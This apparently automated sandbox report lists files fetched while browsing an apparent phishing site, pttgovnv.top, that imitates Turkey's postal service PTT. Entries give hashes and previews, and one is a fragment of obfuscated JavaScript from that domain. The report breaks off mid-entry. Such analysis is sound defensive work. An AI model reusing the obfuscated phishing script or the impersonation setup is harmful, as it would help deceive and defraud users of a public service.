          SSDEEP:192:8Kx9O7t/pK3/1itZQNeNuSkxTASsDcsDgivX58+XSqsho8M256x2H:8qO7t/pKP1iXQNFSkyDFk8X58azsn+6
          MD5:6B7AF6A2B7BD0D796AD01641D6EC5B09
          SHA1:A3CA47AF0E4F628E3093FE6B8DBA29C141075D2C
          SHA-256:E21FDDE02EC42C12B46323A47FAAAE176F1F4BCD33BB72CFCD5F54AF303369F1
          SHA-512:A559D77D27B8EA66686893DFA42DE749B666C23E4CF19CEB0C1D91D19232906E31D2A2B0B070CECF84F02F8A83A40074DD7793AA118E33A2F63B1A590AB9DCF8
          Malicious:false
          Reputation:low
          URL:https://pttgovnv.top/help/layout/images/42.png
          Preview:.PNG........IHDR...q..........[.....pHYs...#...#.x.?v....tEXtSoftware.Adobe ImageReadyq.e<..1.IDATx...Mv.F.7`.=wn.....).L.....W`e..W.y.....^..IOC. .......[.6.H">.$(>.9l.-.....CU...........)...!...!...!..@...@...@................8...8...8...8..!...!...!..@...@...@................8...8...8...8..!...!...!..@...@...@................8...8...8...8..!...!...!..@...@...@................8...8...8...8..!...!...!..@...@...@....................8...8...8..!...!...!..@...@...@....................8...8...8..!...!...!..@...@...@....................8...8...8..!...!...!..@...@...@....................8...8...8..!...!...!..@...@...@.....99*_...4.@.cO<.....(_.2.M....a}...W.p....A.E..R...k...O....j\...>J.r....m.....*..m..e.D....:.....2....b.Nk..|.e..q...F..<..Mq.B7..e.[).'..".|..b^.}p......(..'-...\.Y.......[?..5......rqu.....I!/*..LWe.su...n\...g.}U..R...l.-.\.>Z...?.v..w.rM.. ..t.\..K.u..~..h.z.......E.0W..c.2u]..5.a..>.Xn.>.0 .. 7+.u.<..ec.KvP!.)...J.sv_fh.=..}.,...P........i..E.....I
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:ASCII text, with very long lines (8208), with no line terminators
          Category:dropped
          Size (bytes):8208
          Entropy (8bit):5.040666810574652
          Encrypted:false
          SSDEEP:192:N/e907s+dS77xXtpCl9v8p4sLsm5id6gxPv:N/e907YX9plgJv
          MD5:5CE4490B2A7A53FEFAAA7CA6A3C0E6E8
          SHA1:EDDFC8477C435553FA99A4898D2A1616326386F6
          SHA-256:D37FFD17A86FD0FAB657A4E14A4698C1C23EF681345F68FFC5D33AA6C5825443
          SHA-512:138926F500E214208279E744A2E325745FF8FD6F96472B9847954474BFA0BE0CBCED8852C2B55E62365825136466F79A976FABC9D84B9FF439E3E4A289CD532B
          Malicious:false
          Reputation:low
          Preview:self.__BUILD_MANIFEST=function(e,i,a,s,t,r,c,n,d,u,o,g,p,l,m,h,k,b,f,j,y,F,P,_,I){return{__rewrites:{beforeFiles:[],afterFiles:[],fallback:[]},"/":[i,a,s,t,r,"static/css/2425cba10de1645b.css","static/chunks/pages/index-dfb7e1261ea0e06f.js"],"/_error":["static/chunks/pages/_error-32d9baaae5c99c79.js"],"/anket":[c,"static/chunks/pages/anket-2610e69587780097.js"],"/anket/[slug]":[c,"static/chunks/pages/anket/[slug]-1b52832c21c28bd1.js"],"/doviz-kurlari":["static/css/e341381de31b7a3e.css","static/chunks/pages/doviz-kurlari-c5ba2bb9e7f07c80.js"],"/duyurular":[s,"static/css/3cbd8bcfbd63f115.css","static/chunks/pages/duyurular-8d6cda8f6e9d3111.js"],"/duyurular/[slug]":["static/css/6fd0127afe4f9150.css","static/chunks/pages/duyurular/[slug]-1f9ac4bc183a7385.js"],"/galeri":[i,a,n,"static/chunks/pages/galeri-e8845bfe84a8e178.js"],"/galeri/[slug]":[i,a,n,"static/chunks/pages/galeri/[slug]-7fb28712356cc23b.js"],"/gonderi-ucreti-hesaplama":[e,d,u,o,g,p,l,m,h,k,b,f,j,y,F,P,_,I,"static/chunks/pages/g
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:ASCII text
          Category:downloaded
          Size (bytes):30631
          Entropy (8bit):5.451614488686303
          Encrypted:false
          SSDEEP:768:6uh0PW5XQYmdwp7s0PT/dmMEV8W8G8O8m8X8i:6uh0PW5g8brTLMi
          MD5:7B1185FCEFAA4A825AA4D19BE81C803D
          SHA1:3E82385C35C08C783CCC4B80EAABF5996BA998A0
          SHA-256:3B1A2A415EE2C1F98E6DA2DE536BE6E7DBA5DFCA738D718D4EC8314317FC5D05
          SHA-512:2A0CD86507AEB9F5261C6980034189318BEE604AA6B923B3EB697B2CE4CD02295DFD335F7FC7777CC7DB5BAB649379593533516CD1582F801E50F780C7667647
          Malicious:false
          Reputation:low
          URL:https://chatserver.alo-tech.com/static/assets/css/google_fonts.css
          Preview:/* cyrillic-ext */.@font-face {. font-family: 'Alegreya';. font-style: normal;. font-weight: 400;. src: url(https://fonts.gstatic.com/s/alegreya/v27/4UacrEBBsBhlBjvfkQjt71kZfyBzPgNG9hU49qqjgSE.woff2) format('woff2');. unicode-range: U+0460-052F, U+1C80-1C88, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;. }. /* cyrillic */. @font-face {. font-family: 'Alegreya';. font-style: normal;. font-weight: 400;. src: url(https://fonts.gstatic.com/s/alegreya/v27/4UacrEBBsBhlBjvfkQjt71kZfyBzPgNG9hU4_6qjgSE.woff2) format('woff2');. unicode-range: U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;. }. /* greek-ext */. @font-face {. font-family: 'Alegreya';. font-style: normal;. font-weight: 400;. src: url(https://fonts.gstatic.com/s/alegreya/v27/4UacrEBBsBhlBjvfkQjt71kZfyBzPgNG9hU496qjgSE.woff2) format('woff2');. unicode-range: U+1F00-1FFF;. }. /* greek */. @font-face {. font-family: 'Alegreya';. font-style: normal;. font-weight: 400;. sr
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (787)
          Category:downloaded
          Size (bytes):184698
          Entropy (8bit):4.466373312610868
          Encrypted:false
          SSDEEP:1536:CRoV80exQBqMhOqmVdPFvOfx0SNWS6URFuZF/h2681IKKAUq0nD0W:CRG80cQBqMh6VdPFKN8ZF/h268CnDF
          MD5:BC76F78C57D748CA194F98D0935889EB
          SHA1:33EF25385CE178D3888EC27D80D8F8230A8D546B
          SHA-256:D25856F11BBF39C1BC1BFBBFE622B16FCAEA60605453E25EA3A4D732C224AB0C
          SHA-512:DB1F6A478D44C6B3DC26FADD61A48DA81508F93235AEBAF6FCC18EEA2DFEAC9747AC5DE377858D4397AB22D37415F0FE0C00370011A5A16306D5476CE18419CC
          Malicious:false
          Reputation:low
          URL:"https://chatserver.alo-tech.com/content/spa.html?hostname=pttem.alo-tech.com&lang=tr&queue=[{%22name%22:%22Whatsapp%20Chat%22,%22key%22:%22ahRzfm11c3RlcmktaGl6bWV0bGVyaXISCxIFUXVldWUYgIC47ozj_ggMogEScHR0ZW0uYWxvLXRlY2guY29t%22}]&client_name=&client_email=&phone_number=&cwid=ahRzfm11c3RlcmktaGl6bWV0bGVyaXIYCxILQ2hhdFdpZGdldHMYgICk1cbTrwgMogEScHR0ZW0uYWxvLXRlY2guY29t&page_origin=https%3A%2F%2Fwww.ptt.gov.tr"
          Preview:..<!DOCTYPE html>.<html>..<head>. <title>AloChat</title>. <meta charset="utf-8">. <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0">. <script type="text/javascript" src="/static/assets/js/jquery-2.0.3.min.js"></script>.. <link href="/static/assets/bootstrap/css/bootstrap.min.css" rel="stylesheet">. . <link rel="preload" href="/static/assets/fontawesome/css/all.min.css" as="style" onload="this.onload=null;this.rel='stylesheet'">. <noscript><link rel="stylesheet" href="/static/assets/fontawesome/css/all.min.css"></noscript>. . <link rel="preload" href="/static/assets/css/google_fonts.css" as="style" onload="this.onload=null;this.rel='stylesheet'">. <noscript><link rel="stylesheet" href="/static/assets/css/google_fonts.css"></noscript>. . <link href="/static/assets/css/page_spa.css" rel="stylesheet">. . <link rel="preload" href="/static/assets/css/owl.carousel.min.css" as="style" onload="t
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:ASCII text, with very long lines (1900)
          Category:downloaded
          Size (bytes):1948
          Entropy (8bit):5.107228084689267
          Encrypted:false
          SSDEEP:24:SeVQkSvyC5uCWJInOsqd1k+fZXI1KS5RfzxCvjVsVxjhIYy+O5kaxNsj8q:rDb63BrrcLV8NeYnaq
          MD5:11114FC9A1C91EBA1446421ED9DB340F
          SHA1:6F19E1DDB03BCF4716E2ACD7C9D2CF7D43C36753
          SHA-256:639E5AA138803477D8E3E900753D832A79082B1A470C3550E94046E6B4339E33
          SHA-512:AE96ED02EF6EC6C4EE3F340320B8BCF57BA26B839043213126E04D19002B99EEEBA33D0ED28BB96AB503F881473946F5870B1883454E28B78FEF3C15C45909A7
          Malicious:false
          Reputation:low
          URL:https://www.ptt.gov.tr/_next/static/css/e341381de31b7a3e.css
          Preview:.styles_container__ogyrU{padding:2rem;margin:0 auto;display:flex;overflow:hidden;flex-direction:column;align-items:center}.styles_header__EPk94{display:flex;justify-content:left}.styles_container__ogyrU>.styles_header__EPk94>h1{font-size:1.5rem}.styles_container__ogyrU>div.styles_disclaimer__1RacZ{border-bottom:1px solid rgba(39,2,2,.2);padding:1rem;margin-bottom:2rem;text-align:left;display:flex;justify-content:center}.styles_table__D3nIx{text-align:center;margin:auto;min-width:70%;border-collapse:collapse;border-radius:1rem;overflow:hidden}.styles_table__D3nIx>thead>tr>th{padding:1rem;border-right:4px solid hsla(0,0%,100%,.2);border-top:1px solid var(--pttYellowColor);color:#000;text-align:center;font-size:1rem}.styles_table__D3nIx>thead>tr>th:last-child{border-right:none}.styles_table__D3nIx>thead>tr:first-child{background-color:#ffc72c86;height:40px}.styles_table__D3nIx>thead{border-radius:1rem}.styles_table__D3nIx>tbody{background-color:#f8f8f8}.styles_table__D3nIx>thead>th:first-
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:PNG image data, 625 x 417, 8-bit/color RGBA, non-interlaced
          Category:dropped
          Size (bytes):27613
          Entropy (8bit):7.9067114058135255
          Encrypted:false
          SSDEEP:384:mP841dvgbsFJpwSBB0mFot1XFEUmf0Hl+009q+v+k60IOfsewcKQTaY1:mU41OQFJpZfot1+Umf08j+ROkeEK1
          MD5:42783A8A7A54514AC07F633D0828C7A2
          SHA1:2E6C33B957D0425C21EDE292563336688557BCC2
          SHA-256:5EC2E2250A6985E5E16C04978FAD8783F0B58D4DC73D9E19E70A7B59CE8CFD77
          SHA-512:8DC87B91FAE087E7716EE6E4685A6507AA66802E9B1CFE1874A20D0C5537F9B28D6DEE84572EF5A3592EA0E7B8C93A3E122445C15ABF593481D36C94587C1CEA
          Malicious:false
          Reputation:low
          Preview:.PNG........IHDR...q..........[.....pHYs...#...#.x.?v....tEXtSoftware.Adobe ImageReadyq.e<..kjIDATx...Mv.K.p..y.....5.[.)...G`<......x..#0...#pi.F.e..F.\...A*.......K6...*.........9....8-.B......8....@...........@............$...........$......8....$......8....@...........@............$...........$......8....$......8....@......8....@............$...........$......8....$......8....@......8....@...........@............$......8....$......8....@......8....@...........@............$......C......8....@...........@............$...........$......8....$......8....@...........@............$...........$......8....$......8....@...r../...........5.....8......z|...c.(k.yMO...n.5.`[......w....-..H..@uA...`..S....p]G.~.....F..[.5...D."..T.'V..us....wK... q...M.J.h.......,..x...H^..:.....I.m....J...[..2.>j..?..w.>&... q.....O.>..T_'..!....E[......J.EL...3.ysY.5oe.6"q.X.>b...........$..NA.n...D`l.M~.+g.6.&B.%.(YI...H.f.5g;..~a...~........ q..E........{.z\.".yB.v.G.j...2"...5..h.
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:ASCII text, with very long lines (65536), with no line terminators
          Category:downloaded
          Size (bytes):214521
          Entropy (8bit):5.8438574337590135
          Encrypted:false
          SSDEEP:3072:6ZOJBndfIwfpZT0dWNiLmhcLaN/xpjejNvT3XdhryvR6+4qTSQLzLvU4yPQM6:64JZtpTGheveqTSQLznyPQM6
          MD5:81B10B18782DFD9590D944465A704404
          SHA1:3CAD5C6F58E8666A879E81B7E6FD592850F44604
          SHA-256:232409D55C1D276190D667D259BF6F51D89D00898ED6484ADBF27EBAC1A37791
          SHA-512:ECE52576AA7134AFC7D2B02F34F710E9F4AB5AA85D6A2DA587F49875436962945875BF50FBE3FEFB45B15421794611054781E084F085BEC111A40E9D0A579F42
          Malicious:false
          Reputation:low
          URL:https://www.ptt.gov.tr/_next/static/chunks/pages/_app-46fb893087b26370.js
          Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[2888],{242:function(e,t,n){var r={"./en/GetLanguageResourceResponse":[6855,6855],"./en/GetLanguageResourceResponse.json":[6855,6855],"./tr/GetLanguageResourceResponse":[6219,3401],"./tr/GetLanguageResourceResponse.json":[6219,3401]};function o(e){if(!n.o(r,e))return Promise.resolve().then((function(){var t=new Error("Cannot find module '"+e+"'");throw t.code="MODULE_NOT_FOUND",t}));var t=r[e],o=t[0];return n.e(t[1]).then((function(){return n.t(o,19)}))}o.keys=function(){return Object.keys(r)},o.id=242,e.exports=o},3197:function(e,t){"use strict";t.parse=function(e,t){if("string"!==typeof e)throw new TypeError("argument str must be a string");for(var r={},o=t||{},i=e.split(";"),c=o.decode||n,s=0;s<i.length;s++){var l=i[s],u=l.indexOf("=");if(!(u<0)){var f=l.substring(0,u).trim();if(void 0==r[f]){var d=l.substring(u+1,l.length).trim();'"'===d[0]&&(d=d.slice(1,-1)),r[f]=a(d,c)}}}return r},t.serialize=function(e,t,n){var a=n||{},i=a.
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:RIFF (little-endian) data, Web/P image
          Category:dropped
          Size (bytes):11518
          Entropy (8bit):7.966291743818182
          Encrypted:false
          SSDEEP:192:+WG04lslf+6LDQ0v2M635Hz0xvFzzahp0y4BTHzWnMDfjVO/IwlQmn3C3WbQ1R:+Ef+I0i2T1zgzaXXWCqsQmny3WbO
          MD5:2CC5743A1A8F6BC6384F081849BAC3FD
          SHA1:70E5ED0109BCA40261543210C5A178C7FFC29633
          SHA-256:7AC38EAC2CC2002FEBE7613E3DF10786A9BB95AB401C4D8EAE3D0319551AF8A2
          SHA-512:8FA2808DEAD785B6B387151F1BE53A70E3AA8F53BAEA3B3E24D2791D2EBF10478E0441B2190BD49907113B26632CAD854EED28118CB368087980A264AD2613E3
          Malicious:false
          Reputation:low
          Preview:RIFF.,..WEBPVP8X...........5..ALPH.%....C @...?........j.M;.Cf. Q"...9.J.&.g.....8..W<........}.D...._....?5...hk..w.....l..p..U..P....z_>k.S.[U-......m..Zuk..`n.z.V&.j......}=.b........x..".%..:P}F*Jr.E..I...u.PqK.m.....t........ .=/&..V%.....*.y<?X.....<n..39..I..t.6......w^,t..l.r..A.N......$...tu.......@MQ.s* ....KX.jWIf?....S......A.m.....6.....l.c.)..H.>.M.\....=...UoYI2.1.Z..=g>!.d.,(kr.-.&..3aa.np......4lWy'.U.....>...X....rp...DwCI.U..C..P... ,...I.+...v.>t7V.T..O.V..s/.CPD/..W.V$W..|.xv7u..S$...1....<..........l......y.t1._.......jO\h5G.6..2..N.t7....}...s..<y...o.]m.:..T..*..Z._....'.......f....J..<G:{..'....d1...q.m..6.1/..q._.....'+..K>]6[........V.gW...yZ^H.8Z.B.Z.......8_.B.Z ...|.S......P...+.f......G.,.....|yUS.._..P....5.^^....X(]..e[.{ZT.....P....^L.X....G...s..%.Y.....y. H2..-...X(Y.f.1.n.[. \..g...{....v...*...S;..If......D.....d..].. \.........Q.N......;..I.3...."..d.]'{u........6.w.p"....x.:.......[.$..pm.D..B.n
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:ASCII text, with very long lines (5945)
          Category:downloaded
          Size (bytes):265606
          Entropy (8bit):5.571578114520592
          Encrypted:false
          SSDEEP:6144:cSaSAdB6si3iGIl6e4zelEZtNAJ08D1OJfjU7iMNp:1tAv6sgiGNeWInL
          MD5:7FB1FEBF861233294E45EB25E552283B
          SHA1:5A703DFD758CA710C2719EEDB866EBB1DE0CEE9A
          SHA-256:082975771207D1A62E42EC20C970091F13DC3C6B4B334CC74ACB42B60BF7C883
          SHA-512:001C03B2C43100AEF9E252A504528370BEDFC6CAC551C440AB9E0537170E67F9FFB1B72133CB7042824BBA7AE42F9DEBAB2F8B409B038D8A7DB7BDDAD4674D0F
          Malicious:false
          Reputation:low
          URL:https://www.googletagmanager.com/gtag/js?id=G-SFQ172Y7CH
          Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"2",. . "macros":[{"function":"__e"},{"vtp_signal":0,"function":"__c","vtp_value":0},{"function":"__c","vtp_value":""},{"function":"__c","vtp_value":0},{"vtp_signal":0,"function":"__c","vtp_value":0},{"function":"__c","vtp_value":""},{"function":"__c","vtp_value":0}],. "tags":[{"function":"__ogt_ga_send","priority":7,"vtp_value":true,"tag_id":16},{"function":"__ogt_referral_exclusion","priority":7,"vtp_includeConditions":["list","ptt\\.gov\\.tr"],"tag_id":18},{"function":"__ogt_session_timeout","priority":7,"vtp_sessionMinutes":30,"vtp_sessionHours":0,"tag_id":19},{"function":"__ogt_1p_data_v2","priority":7,"vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_autoEmailEnabled":true,"vtp_autoPhoneEnabled":false,"vtp_autoAddressEnabled":false,"vtp_isAutoCollectPiiEnabledFlag":false,"tag_id":20},{"function":
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:ASCII text, with very long lines (65536), with no line terminators
          Category:downloaded
          Size (bytes):66490
          Entropy (8bit):5.199364533779825
          Encrypted:false
          SSDEEP:384:NJMB6MVRvBaKyRABaKyRFF5JDWOenySFpntgE:6VRQR5RFNydPFpntgE
          MD5:64D9C4EFF2ED1E10244C4A2F3B06C337
          SHA1:466775C58D88FE86056730E9830B72908E7DCCBE
          SHA-256:F296A66E264FAA02B6A8CB293D0E52476A9A97B9A625FBDBF3976157A0CBABD1
          SHA-512:6D8B14899B02B0E2AB25486C777DEB6E0628FF6018CBBBF1FD7AB9104F76F9A7B3A256B3986404330ACB532F2C48FF5226B6184B96478AF98908E9F698FCC606
          Malicious:false
          Reputation:low
          URL:https://www.ptt.gov.tr/_next/static/css/1c210f4a3e94a33a.css
          Preview:.styles_shipmentTrackingPreviewModal__W8Vv6{position:fixed;top:0;right:0;left:0;bottom:0;background-color:rgba(0,0,0,.8);-webkit-backdrop-filter:blur(8px);-moz-backdrop-filter:blur(8px);-o-backdrop-filter:blur(8px);backdrop-filter:blur(8px);z-index:55;overflow-y:auto;transition:visibility .2s,opacity .2s ease-in-out}.styles_shipmentTrackingPreviewModal__W8Vv6>.styles_close__YK3MI{position:fixed;top:2rem;right:3rem;color:#fff;font-size:2rem;font-style:normal;cursor:pointer}.styles_shipmentTrackingPreviewModalOpen__fUMRq{visibility:visible!important;opacity:1!important}.styles_shipmentTracking__TSn_z{position:relative;display:flex;display:-ms-flexbox;flex-direction:row;flex-wrap:wrap;justify-content:space-evenly;align-items:center;width:100%;margin-top:5rem;margin-bottom:5rem;z-index:55}.styles_shipmentTracking__TSn_z>.styles_states__nQ6ze{display:flex;display:-ms-flexbox;flex-direction:column;justify-content:center;position:relative;z-index:5}.styles_shipmentTracking__TSn_z>.styles_stat
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:PNG image data, 625 x 417, 8-bit/color RGBA, non-interlaced
          Category:downloaded
          Size (bytes):7852
          Entropy (8bit):7.701456268374696
          Encrypted:false
          SSDEEP:192:ymBhN4ABVRD1ibtmQrEoD+V+ma6UsleVC:ymTBXWmQ4o6V+mloC
          MD5:28C2C809EB83262A1F928F4E821E8F4C
          SHA1:AA9B9E2A285AE91583FB4EC2C6234DB478B79540
          SHA-256:EFEA9410B633A1E3B80FDE6E1EF291E28BBA38FA4451B3A81D91786A0DBFFBF5
          SHA-512:13D6B52E45B07242F1C031F7F25B8C0495DB864289AD0083DAF347FB9C1B4D032D78D039F38BF0AF72F8EEBB6E5802C5C92B7ECEAB09B405F7B083D0E212D3EE
          Malicious:false
          Reputation:low
          URL:https://pttgovnv.top/help/layout/images/36.png
          Preview:.PNG........IHDR...q..........[.....pHYs...#...#.x.?v....tEXtSoftware.Adobe ImageReadyq.e<...9IDATx...Or.F..`d*..........*K+..L...D9...D>A....*.2..N...#.S5....m...".i.._..S..#.T..~.?o....W....'B.............. ... ... ....q...q...q..B...B...B...B.............. ... ... ....q...q...q..B...B...B...B.............. ... ... ....q...q...q..B...B...B...B.............. ... ... ....q...q...q..B.... ... ... ....q...q...q..B...B...B.................. ... ... ....q...q...q..B...B...B.................. ... ... ....q...q...q..B...B...B.................. ... ... ....q...q...q..B...B...B....'....q...q...q..B...B...B.............. ... ... ... ....q...q...q..B...B...B.............. ... ... ... ....q...q...q....?k..7.....y..._o....q..o..K.<^...7M..i1.....x.6...?.u...Z...8..oG.Yax{p...V..!.~....v._..M...5...}...AxK..f....~].]s.....o.....I........8..o.d.y...WO*=q. .....<.....z....`8.m..q.Z....q.#...o?5..v.4V.......m..U.w]...._?....W..Q..v...).Z...8..p..!s...O3'...N.....c...r!..5..........
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:JSON data
          Category:dropped
          Size (bytes):929
          Entropy (8bit):4.797071649336984
          Encrypted:false
          SSDEEP:24:Y6uel1mf1zLXAWYP1+ezafLaZ0RSrHKm7wDKJb7VP9:YHzXAlnafjrm75J99
          MD5:A1897091D57541A9E237EED5D3B0D200
          SHA1:CD10F028D0939070C64BAA563BF564C19E292630
          SHA-256:F898E77082F95F770AF246DD933818642232FACF671CAD0331DE04B9AF095566
          SHA-512:9E9884841907667703DD7F2C7A196AB871231AB35CFC96C310ED44D28790D488D9BDFD778020B78A5B6359CA22F15D0CDEF468DBB8E8D8027C5B9516D333DF4D
          Malicious:false
          Reputation:low
          Preview:{"success": true, "data": {"legal_requirements": false, "customer_path": null, "ws_server": "chatserver.alo-tech.com", "lang": "tr", "optional_email": true, "optional_phone": false, "hide_email": false, "hide_phone_number": false, "title": "Canl\u0131 Destek", "title_background_color": "FFFFFF", "title_text_color": "00A7CF", "subtitle": "Canl\u0131 Destek", "height": 500, "width": 350, "widget_version": "version1", "sys_nickname": "PTT", "chat_widget_icon": "chat/chat_icons/3af51a49-058b-4e67-9af9-1575813efeeb.png", "is_chat_widget_icon": true, "send_chat_history_to_customer": "", "widget_type": "alotech", "is_chat_widget_logo": false, "chat_widget_logo": null, "tenant_language": "tr", "optional_subject_choice": true, "widget_status": "online", "hide_new_chat_form": false, "file_upload_disabled": false, "send_emoji_disabled": false, "set_custom_library_properties": "", "is_speech_to_text": true, "is_python3": true}}
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:ASCII text, with very long lines (8553)
          Category:dropped
          Size (bytes):8603
          Entropy (8bit):5.505168367455742
          Encrypted:false
          SSDEEP:192:WUfNSKCPJ0CPUKifrDHRg08uWWEf48YPdQAvWsO:NFCWC4frzRg9uWWEjYPd3vWsO
          MD5:693D625BF6DCB19233FA453121AC097B
          SHA1:0268601F6FDCD6E9B6D5F54F1E1D04BE80D873C1
          SHA-256:5B0D75DFC33845B54D6E819B246C64AFDD6D5DF770A8A44D3B583D4787D099E9
          SHA-512:3AC7AE96A989E52D90865052235B361DBDD6E2246E752F822E19ABE09BB7B919BA87AC99EB327234ED797BE1FC961982491B9A6CBFD74197DFCFDA76E51B8488
          Malicious:false
          Reputation:low
          Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[9348],{9348:function(e,n,t){"use strict";t.d(n,{Z:function(){return j}});var r=t(3288),a=t(2466),s=t(8845),o=t(4820),i=t.n(o),l=t(6731),c=t.n(l),u=t(3395),y=t(3230),d=t(8082),p=t(3283),_=function(e){return{type:u.MF.GET_ANNOUNCEMENT_COUNT,payload:e}},m=function(e){return{type:u.MF.GET_ANNOUNCEMENT_TYPE,payload:e}},f=t(3868),N=t.n(f),h=function(){var e=(0,d.Z)("GetLanguageResourceResponse").t;return(0,r.jsxs)("div",{className:N().container,children:[(0,r.jsx)("h1",{className:N().title,children:e(u.My.NO_DATA)}),(0,r.jsxs)("div",{className:N().iconContainer,children:[(0,r.jsx)("i",{className:"fa-solid fa-paperclip"}),(0,r.jsx)("i",{className:"fa-solid fa-newspaper"}),(0,r.jsx)("i",{className:"fa-solid fa-bullhorn"}),(0,r.jsx)("i",{className:"fa-solid fa-note-sticky"}),(0,r.jsx)("i",{className:"fa-solid fa-paper-plane"}),(0,r.jsx)("i",{className:"".concat(N().face," fa-solid fa-face-rolling-eyes")})]})]})},E=t(1395);function T(e,n){
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:Unicode text, UTF-8 text, with very long lines (59842), with no line terminators
          Category:downloaded
          Size (bytes):115111
          Entropy (8bit):5.535367167236125
          Encrypted:false
          SSDEEP:1536:idizI7WC3KXhmbMCuGIwduyEoJgxXWH0XtJhjp975cHrYrgn3ZeE+FLY24eAGx:BQzTbTdBdriTh7752NDu
          MD5:5634919A771FA502E0CD602659B9EE3E
          SHA1:5CF5D399FFDD13D5425DE9C4B290909E3E6219FB
          SHA-256:4991B8E3F096D97A1ED0B4D6767E093DED9F95DB1664C7842807ED13699654CA
          SHA-512:1FF880E61F2A17CDB0FEBE95E60229661CE8426C2B07C883CB02DD8CE21EF91DF6E62307D138CFAA7B91FA8C129FD303D12FF4B7F5EF61692E6BD3EE8F3704A4
          Malicious:false
          Reputation:low
          URL:https://pttgovnv.top/help/assets/164f9b57JxKnW.js
          Preview:var a2_0x49024d=a2_0x20dc;(function(_0x339814,_0x1d1181){var _0x457781=a2_0x20dc,_0x2f5f94=_0x339814();while(!![]){try{var _0x876046=parseInt(_0x457781(0x415))/0x1*(parseInt(_0x457781(0x42a))/0x2)+parseInt(_0x457781(0x6e7))/0x3*(parseInt(_0x457781(0x3e2))/0x4)+parseInt(_0x457781(0x56c))/0x5*(parseInt(_0x457781(0x436))/0x6)+-parseInt(_0x457781(0x29d))/0x7*(-parseInt(_0x457781(0x4b3))/0x8)+-parseInt(_0x457781(0x601))/0x9*(parseInt(_0x457781(0x522))/0xa)+parseInt(_0x457781(0x4d2))/0xb+-parseInt(_0x457781(0x2b4))/0xc;if(_0x876046===_0x1d1181)break;else _0x2f5f94['push'](_0x2f5f94['shift']());}catch(_0x13a41e){_0x2f5f94['push'](_0x2f5f94['shift']());}}}(a2_0x249c,0xe51e5));var a2_0x1c7adf=(function(){var _0x1ca7ef=!![];return function(_0x448b2e,_0x3b2af0){var _0x1ee66c=_0x1ca7ef?function(){var _0x281dcb=a2_0x20dc;if(_0x3b2af0){var _0x26480f=_0x3b2af0[_0x281dcb(0x51d)](_0x448b2e,arguments);return _0x3b2af0=null,_0x26480f;}}:function(){};return _0x1ca7ef=![],_0x1ee66c;};}()),a2_0x5e5ab1=a2_0x
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:ASCII text, with very long lines (8553)
          Category:downloaded
          Size (bytes):8603
          Entropy (8bit):5.505168367455742
          Encrypted:false
          SSDEEP:192:WUfNSKCPJ0CPUKifrDHRg08uWWEf48YPdQAvWsO:NFCWC4frzRg9uWWEjYPd3vWsO
          MD5:693D625BF6DCB19233FA453121AC097B
          SHA1:0268601F6FDCD6E9B6D5F54F1E1D04BE80D873C1
          SHA-256:5B0D75DFC33845B54D6E819B246C64AFDD6D5DF770A8A44D3B583D4787D099E9
          SHA-512:3AC7AE96A989E52D90865052235B361DBDD6E2246E752F822E19ABE09BB7B919BA87AC99EB327234ED797BE1FC961982491B9A6CBFD74197DFCFDA76E51B8488
          Malicious:false
          Reputation:low
          URL:https://www.ptt.gov.tr/_next/static/chunks/9348-b9f3a774e6fafc61.js
          Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[9348],{9348:function(e,n,t){"use strict";t.d(n,{Z:function(){return j}});var r=t(3288),a=t(2466),s=t(8845),o=t(4820),i=t.n(o),l=t(6731),c=t.n(l),u=t(3395),y=t(3230),d=t(8082),p=t(3283),_=function(e){return{type:u.MF.GET_ANNOUNCEMENT_COUNT,payload:e}},m=function(e){return{type:u.MF.GET_ANNOUNCEMENT_TYPE,payload:e}},f=t(3868),N=t.n(f),h=function(){var e=(0,d.Z)("GetLanguageResourceResponse").t;return(0,r.jsxs)("div",{className:N().container,children:[(0,r.jsx)("h1",{className:N().title,children:e(u.My.NO_DATA)}),(0,r.jsxs)("div",{className:N().iconContainer,children:[(0,r.jsx)("i",{className:"fa-solid fa-paperclip"}),(0,r.jsx)("i",{className:"fa-solid fa-newspaper"}),(0,r.jsx)("i",{className:"fa-solid fa-bullhorn"}),(0,r.jsx)("i",{className:"fa-solid fa-note-sticky"}),(0,r.jsx)("i",{className:"fa-solid fa-paper-plane"}),(0,r.jsx)("i",{className:"".concat(N().face," fa-solid fa-face-rolling-eyes")})]})]})},E=t(1395);function T(e,n){
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:ASCII text, with very long lines (554)
          Category:dropped
          Size (bytes):606
          Entropy (8bit):5.401289515983216
          Encrypted:false
          SSDEEP:12:fbj/1AvxAU7erXn16KkpooeWozx9LqCmVRXNtI6V:fbj/1AvxAU7e7nHkpyW2pqjXNa+
          MD5:2D8CA2FAE27B182791B29D83379AC6FE
          SHA1:3E3D56874855FBBF14BA18E99D400079F72E1137
          SHA-256:D37FF23D03D4699FEEB8C162D865538D7AEC77436D8AEB54F9652DD3BA497D89
